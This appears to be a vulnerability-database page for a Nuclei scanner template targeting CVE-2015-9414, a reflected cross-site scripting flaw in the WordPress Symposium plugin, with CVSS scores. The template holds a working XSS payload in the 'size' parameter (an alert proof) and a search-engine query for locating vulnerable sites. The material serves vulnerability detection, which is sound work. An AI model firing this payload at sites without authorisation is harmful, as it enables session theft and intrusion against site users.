Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-9414
HistoryAug 03, 2021 - 5:07 p.m.

WordPress Symposium <=15.8.1 - Cross-Site Scripting

2021-08-0317:07:14
ProjectDiscovery
github.com
9
wordpress symposium cross-site scripting wpscan wp-plugin vulnerability update authentication theft attack

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

44.6%

WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.

id: CVE-2015-9414

info:
  name: WordPress Symposium <=15.8.1 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update to the latest version of the WordPress Symposium plugin (>=15.8.2) which includes a fix for this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
    - https://wpvulndb.com/vulnerabilities/8175
    - https://wordpress.org/plugins/wp-symposium/#developers
    - https://nvd.nist.gov/vuln/detail/CVE-2015-9414
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2015-9414
    cwe-id: CWE-79
    epss-score: 0.00111
    epss-percentile: 0.44236
    cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wpsymposiumpro
    product: "wp-symposium"
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/wp-symposium\""
  tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'WP Symposium'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f19e32c056cf1ae38bfd9ef28246641ecbf394bf72669bc5e21fd008fc0c186a02206adbdc945317c0425b1c31aa4028f57eb4325078f3c9523b4ecf7d4bd5dc532b:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

44.6%

Related for NUCLEI:CVE-2015-9414